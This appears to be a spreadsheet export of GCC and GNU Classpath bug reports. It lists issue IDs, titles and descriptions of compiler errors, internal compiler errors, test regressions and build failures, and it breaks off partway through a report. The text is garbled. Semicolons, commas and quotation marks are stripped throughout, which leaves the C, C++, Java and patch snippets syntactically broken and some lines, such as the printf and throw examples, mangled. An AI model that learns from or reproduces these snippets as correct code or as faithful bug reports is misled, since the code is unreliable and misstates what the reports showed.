gcc version 4.0.4 20060507 (prerelease) (Debian 4.0.3-3)
cat a.c
typedef struct _a_t {
    int b 
} * a_t 
extern a_t c(int) 
int main() {
    a_t const a0 = c(0) 
    a_t a1 = c(sizeof(*a1)) 
    a_t const a2 = c(sizeof(*a2)) 
    a_t const a3 = c(sizeof(*a2)) 
    a_t const a4 = c(sizeof(*a0)) 
    a0-&gt;b = 0 			/* ok */
    a1-&gt;b = 0 			/* ok */
    a2-&gt;b = 0 			/* not ok */
    a3-&gt;b = 0 			/* not ok */
    a4-&gt;b = 0 			/* ok */
    return 0 
}
g++-4.0 -c a.c
a.c: In function 'int main()':
a.c:15: error: base operand of '-&gt;' is not a pointer
a.c:16: error: base operand of '-&gt;' is not a pointer
make: *** [a.o] Error 1
Compilation exited abnormally with code 2 at Sat May 20 15:41:55</t>
  </si>
  <si>
    <t>markghayden</t>
  </si>
  <si>
    <t>GCC-16789</t>
  </si>
  <si>
    <t>ICE in force_evaluation_order() on valid code</t>
  </si>
  <si>
    <t>The following test case segfaults in force_evaluation_order() when compiling to
 native.
When compiling the same test to bytecode the compiler does not crash but the
generated bytecode is invalid (fails to verify on both gij and Sun's VM)
public class Crash
{
  public static void main(String[] args)
  {
    System.out.println(Thread.currentThread().holdsLock(this))
  }
}</t>
  </si>
  <si>
    <t>CLASSPATH-23987</t>
  </si>
  <si>
    <t>JDialog causes parent window to lose focus.</t>
  </si>
  <si>
    <t>When a JDialog appears the parent window loses focus.</t>
  </si>
  <si>
    <t>GCC-53565</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: libgomp.c++/for-7.C</t>
  </si>
  <si>
    <t>Between revisions 188113 (OK see http://gcc.gnu.org/ml/gcc-testresults/2012-06/msg00085.html ) and 188118 (see http://gcc.gnu.org/ml/gcc-testresults/2012-06/msg00094.html ) the test libgomp.c++/for-7.C has started to fail with:
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ /opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C  -B/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp/ -B/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp/.libs -I/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp -I/opt/gcc/work/libgomp/testsuite/.. -march=i486 -shared-libgcc -fmessage-length=0 -fno-diagnostics-show-caret -fopenmp  -O0  -std=c++0x -fopenmp -B/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp/../libstdc++-v3/src/.libs   -L/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp/.libs -L/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libgomp/../libstdc++-v3/src/.libs -lstdc++ -lm   -m32 -o ./for-7.exe    (timeout = 300)
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C: In instantiation of 'void f2() [with T = int]':
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:95:12:   required from here
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:49:3: error: use of 'i' before deduction of 'auto'
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C: In instantiation of 'void f5() [with T = const char*]':
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:104:21:   required from here
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:77:3: error: use of 'i' before deduction of 'auto'
compiler exited with status 1
...
FAIL: libgomp.c++/for-7.C  -O0  (test for excess errors)
Excess errors:
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:49:3: error: use of 'i' before deduction of 'auto'
/opt/gcc/work/libgomp/testsuite/libgomp.c++/for-7.C:77:3: error: use of 'i' before deduction of 'auto'
From the error it seems that this is caused by r188116.</t>
  </si>
  <si>
    <t>GCC-27162</t>
  </si>
  <si>
    <t>[4.1 regression] search_n uses == when it should use binary_pred</t>
  </si>
  <si>
    <t>The binary predicate variant of search_n for forward iterators uses the == operator where it should be calling __binary_pred. Patch (against GCC 4.1.0 should also apply to the trunk) attached. Bug report courtest of ConceptGCC's type checker :)
--- include/bits/stl_algo.h.old 2006-04-14 11:59:59.000000000 -0400
+++ include/bits/stl_algo.h     2006-04-14 12:00:08.000000000 -0400
@@ -7487 +7487 @@
            __n = __count
          _ForwardIterator __i = __first
          ++__i
-         while (__i != __last &amp;&amp; __n != 1 &amp;&amp; *__i == __val)
+         while (__i != __last &amp;&amp; __n != 1 &amp;&amp; __binary_pred(*__i __val))
            {
              ++__i
              --__n
2006-04-14	Douglas Gregor  
	* include/bits/stl_algo.h (__search_n): Use __binary_pred not ==.</t>
  </si>
  <si>
    <t>GCC-6044</t>
  </si>
  <si>
    <t>gcc-3.0.4 from cvs fails to make on darwin</t>
  </si>
  <si>
    <t>Hi all
hope this is the correct place to ask for assistance. I have been trying to compile a gcc cross compiler for a powerpc-apple-darwin5.3 host and a m68k (68332) target for the last two weeks.
I have searched the web and have posted to numerous email lists and have as yet been unable to find anyone who has been able to compile a gcc cross compiler on OSX.
I have successfully buiilt and installed binutils-2.11.2
I have configured gcc with the following command:
bash2.05 james@localhost ~/projects/source/build-gcc % /Users/james/projects/source/gcc-3.0.4/configure --enable-languages=cc++ --target=$target --prefix=$prefix -v
When I issue a make all install command its fails with the following....
rest of make output....
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: missing right curly brace found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: undefined type found `ATTR_PRINTF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: undefined type found `ATTR_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: undefined type found `ATTR_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: undefined type found `ATTR_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: undefined type found `ATTR_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: illegal external declaration missing `' after `ATTR_FORMAT_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: undefined type found `ATTR_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: illegal external declaration missing `' after `ATTR_FORMAT_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: undefined type found `ATTR_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: illegal external declaration missing `' after `ATTR_FORMAT_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: undefined type found `ATTR_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: illegal external declaration missing `' after `ATTR_FORMAT_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: undefined type found `ATTR_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: illegal external declaration missing `' after `ATTR_FORMAT_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: undefined type found `ATTR_STRFTIME_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: illegal external declaration missing `' after `ATTR_FORMAT_STRFTIME_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: undefined type found `ATTR_STRFMON_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: illegal external declaration missing `' after `ATTR_FORMAT_STRFMON_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: syntax error found `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: syntax error found `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: syntax error found `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: syntax error found `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: syntax error found `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: syntax error found `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: syntax error found `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: syntax error found `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: syntax error found `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: syntax error found `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: syntax error found `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: syntax error found `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: syntax error found `_4'
cpp-precomp: warning: errors during smart preprocessing retrying in basic mode
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:23:
/Users/james/projects/source/gcc-3.0.4/gcc/system.h:331: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/system.h:490
                 from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:23:
/Users/james/projects/source/gcc-3.0.4/gcc/../include/libiberty.h:86: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/../include/libiberty.h:158: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/../include/libiberty.h:168: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/../include/libiberty.h:193: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:24:
/Users/james/projects/source/gcc-3.0.4/gcc/tree.h:2681: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/tree.h:3164: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:26:
/Users/james/projects/source/gcc-3.0.4/gcc/toplev.h:35: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:27:
/Users/james/projects/source/gcc-3.0.4/gcc/output.h:327: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:29:
/Users/james/projects/source/gcc-3.0.4/gcc/rtl.h:1296: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/rtl.h:1549: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:30:
/Users/james/projects/source/gcc-3.0.4/gcc/ggc.h:159: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:28
                 from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.h:26
                 from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:32:
/Users/james/projects/source/gcc-3.0.4/gcc/line-map.h:89: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/line-map.h:94: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.h:26
                 from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:32:
/Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:466: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:493: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:522: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:524: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/cpplib.h:574: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:32:
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.h:495: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.h:497: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.h:553: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:34:
/Users/james/projects/source/gcc-3.0.4/gcc/diagnostic.h:280: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/diagnostic.h:281: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/diagnostic.h:296: warning: ANSI C forbids const or volatile functions
In file included from ./tm_p.h:2
                 from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:35:
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:24: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:25: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:26: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:27: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:28: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:29: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:30: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:31: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:32: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:33: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:34: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:35: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:36: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:37: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:38: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/config/m68k/m68k-protos.h:39: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:37:
/Users/james/projects/source/gcc-3.0.4/gcc/c-lex.h:27: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:480: warning: ANSI C forbids const or volatile functions
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:500: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:4036:
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: redefinition of `ATTR_PRINTF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: `ATTR_PRINTF_1' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: redefinition of `ATTR_FORMAT_PRINTF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: `ATTR_FORMAT_PRINTF_1' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: redefinition of `ATTR_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: `ATTR_PRINTF_2' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: redefinition of `ATTR_FORMAT_PRINTF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: `ATTR_FORMAT_PRINTF_2' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: redefinition of `ATTR_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: `ATTR_PRINTF_3' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: redefinition of `ATTR_FORMAT_PRINTF_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: `ATTR_FORMAT_PRINTF_3' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: redefinition of `ATTR_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: `ATTR_SCANF_1' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: redefinition of `ATTR_FORMAT_SCANF_1'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: `ATTR_FORMAT_SCANF_1' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: redefinition of `ATTR_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: `ATTR_SCANF_2' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: redefinition of `ATTR_FORMAT_SCANF_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: `ATTR_FORMAT_SCANF_2' previously defined here
/Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:4106: warning: ANSI C forbids const or volatile functions
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:4147:
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def: In function `c_init_attributes':
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:94: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: parse error before `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:95: parse error before `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:96: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: parse error before `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:97: parse error before `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:98: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: parse error before `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:99: parse error before `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:100: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: parse error before `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:101: parse error before `_2'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:102: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: parse error before `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:103: parse error before `_3'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:104: parse error before `_0'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: parse error before `_4'
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:105: parse error before `_4'
In file included from /Users/james/projects/source/gcc-3.0.4/gcc/c-common.c:4176:
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def: In function `c_common_insert_default_attributes':
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:126: `ATTR_FORMAT_PRINTF_1_2' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:126: (Each undeclared identifier is reported only once
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:126: for each function it appears in.)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:127: `ATTR_FORMAT_PRINTF_2_3' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:136: `ATTR_FORMAT_SCANF_1_2' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:137: `ATTR_FORMAT_SCANF_2_3' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:139: `ATTR_FORMAT_PRINTF_1_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:140: `ATTR_FORMAT_PRINTF_2_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:142: `ATTR_FORMAT_STRFTIME_3_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:150: `ATTR_FORMAT_PRINTF_3_4' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:151: `ATTR_FORMAT_PRINTF_3_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:152: `ATTR_FORMAT_SCANF_1_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:153: `ATTR_FORMAT_SCANF_2_0' undeclared (first use in this function)
/Users/james/projects/source/gcc-3.0.4/gcc/builtin-attrs.def:166: `ATTR_FORMAT_STRFMON_3_4' undeclared (first use in this function)
make[1]: *** [c-common.o] Error 1
make: *** [all-gcc] Error 2
bash2.05 james@localhost ~/projects/source/build-gcc %
Release:
gcc-3.0.4 from cvs (latest version)
Environment:
powerpc-apple-darwin5.3
binutils-2.11.2
How-To-Repeat:
install binutils-2.11.2 on  powerpc-apple-darwin5.3 host for m68k-elf target
configure gcc-3.0.4 with command  configure --enable-languages=cc++ --target=$target --prefix=$prefix -v
do a 'make all install' for gcc</t>
  </si>
  <si>
    <t>jamesfit</t>
  </si>
  <si>
    <t>GCC-15142</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Internal compiler error when passing a string where a char* is expecteted in a throw statement</t>
  </si>
  <si>
    <t>when compiling this small (and silly) program I get an internal compiler error:
bug34.cpp: In function `void SillyFunc()':
bug34.cpp:12: warning: cannot pass objects of non-POD type `struct std::string' 
through `...' call will abort at runtime
bug34.cpp:12: internal compiler error: in cp_expr_size at cp/cp-lang.c:347
Please submit a full bug report
#include 
class Err
{
    public: Err(char *aErrText...) {}
}
void SillyFunc()
{
    std::string fullname
    throw Err(failed %sfullname)
}</t>
  </si>
  <si>
    <t>GCC-9004</t>
  </si>
  <si>
    <t xml:space="preserve"> Tom&gt; We create detached threads.  My understanding is that such
 Tom&gt; threads *can't* be passed as an argument to pthread_join.
 Wolfgang&gt; But in his code there is a Thread.join() so if this does
 Wolfgang&gt; something it probably calls waitpid() no?
 Nope Thread.join is implemented in a platform-independent way.
 There are no calls to pthread_join in libgcj.
 Tom
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-4214</t>
  </si>
  <si>
    <t>powerpc64: wrong code from optimized mask and shift</t>
  </si>
  <si>
    <t>A certain mask and shift combination produces a wrong answer when
compiled with optimization.
Release:
3.0
Environment:
System: AIX panther 3 4 000785504C00
host: powerpc-ibm-aix4.3.2.0
build: powerpc-ibm-aix4.3.2.0
target: powerpc-ibm-aix4.3.2.0
configured with: ../gcc-3.0/configure
How-To-Repeat:
A program foo.c
        int n = 3
        int
        main (void)
        {
          printf (%d\n (n 
          return 0
        }
when compiled with
        gcc -O -maix64 -mpowerpc64 foo.c
and run just as ./a.out prints 6 whereas I think it should print 4
(and which it does if compiled without the -O).
For what it's worth it seems this only happens under -maix64
-mpowerpc64 not in 32-bit mode.</t>
  </si>
  <si>
    <t>GCC-65940</t>
  </si>
  <si>
    <t>g++.dg/other/anon5.C requires dwarf4 support in  ld</t>
  </si>
  <si>
    <t>g++.log:
...
build/gcc/testsuite/g++2/../../xg++ -Bbuild/gcc/testsuite/g++2/../../ src/gcc/testsuite/g++.dg/other/anon5.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -Inobootstrap/build/x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -Inobootstrap/build/x86_64-unknown-linux-gnu/libstdc++-v3/include -Isrc/libstdc++-v3/libsupc++ -Isrc/libstdc++-v3/include/backward -Isrc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -g -Lbuild/x86_64-unknown-linux-gnu/./libstdc++-v3/src/.libs -Bbuild/x86_64-unknown-linux-gnu/./libstdc++-v3/src/.libs -Lbuild/x86_64-unknown-linux-gnu/./libstdc++-v3/src/.libs -lm -o anon5.exe
/usr/bin/ld: Dwarf Error: found dwarf version '4' this reader only handles version 2 and 3 information.
/tmp/ccgoCWLN.o: In function `f()':
anon5.C:(.text+0x5): undefined reference to `(anonymous namespace)::c::t'
collect2: error: ld returned 1 exit status
compiler exited with status 1
PASS: g++.dg/other/anon5.C  -std=gnu++98 undefined (test for warnings line )
FAIL: g++.dg/other/anon5.C  -std=gnu++98 (test for excess errors)
...
ld version is:
...
GNU ld (GNU Binutils for Ubuntu) 2.20.1-system.20100303
...
Fail in same testcase also observed at: https://gcc.gnu.org/ml/gcc-testresults/2015-04/msg02807.html .</t>
  </si>
  <si>
    <t>CLASSPATH-24508</t>
  </si>
  <si>
    <t>gjdoc</t>
  </si>
  <si>
    <t>Files weren't generated for packages with the name like *.java</t>
  </si>
  <si>
    <t>Hi
it looks like gjdoc doesn't generate files for packages with name like [...].java
For example the Eclipse sources include a package org.eclipse.jdt.ui.text.java</t>
  </si>
  <si>
    <t>julian</t>
  </si>
  <si>
    <t>GCC-33126</t>
  </si>
  <si>
    <t>[4.3 Regression] gimplification failed during stdc++ translation</t>
  </si>
  <si>
    <t>Greetings you fearless gcc developers!
While building a cross toolchain for the powerpc-rtems target I ran into a gimplification error using gcc trunk as of today:
torsten@pulsar:~/rtems/gnu/gcc$ svn info
URL: svn://gcc.gnu.org/svn/gcc/trunk
Revision: 127649
torsten@pulsar:~/rtems/gnu/gcc$ /home/torsten/rtems/gnu/powerpc-rtems/./gcc/xgcc -v
Using built-in specs.
Target: powerpc-rtems
Configured with: ../combined/configure --target=powerpc-rtems --prefix=/home/torsten/opt/powerpc-rtems --with-newlib --enable-threads --enable-languages=cc++
Thread model: rtems
gcc version 4.3.0 20070820 (experimental)
The host system is Debian unstable as of last week but I don't think that makes a difference :-)
Complete command line: 
